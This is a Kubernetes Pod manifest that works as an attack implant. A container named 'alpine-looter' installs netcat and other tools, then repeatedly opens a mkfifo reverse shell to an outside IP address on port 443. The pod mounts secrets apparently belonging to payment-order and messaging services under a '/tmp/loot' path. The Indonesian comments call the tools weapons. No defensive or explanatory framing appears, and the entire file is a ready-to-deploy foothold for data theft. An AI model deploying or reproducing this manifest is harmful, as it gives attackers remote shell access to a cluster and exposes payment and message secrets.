apiVersion: v1
kind: Pod
metadata:
  name: auto-v2
  namespace: backbase
spec:
  containers:
  - name: alpine-looter
    image: alpine:latest
    command: ["/bin/sh", "-c"]
    args:
    - |
      # 1. Install ulang senjatanya pas pod baru lahir
      apk add --update netcat-openbsd python3 mysql-client
      
      # 2. Tembak reverse shell pake jurus mkfifo
      while true; do
        rm -f /tmp/f; mkfifo /tmp/f
        cat /tmp/f | /bin/sh -i 2>&1 | nc 203.175.125.130 443 > /tmp/f
        sleep 5
      done
    volumeMounts:
    - name: v-msg
      mountPath: /tmp/loot/messages
    - name: v-pay
      mountPath: /tmp/loot/payment
  volumes:
  - name: v-msg
    secret:
      secretName: messages-secret
      optional: true
  - name: v-pay
    secret:
      secretName: payment-order-service
      optional: true
  restartPolicy: Never
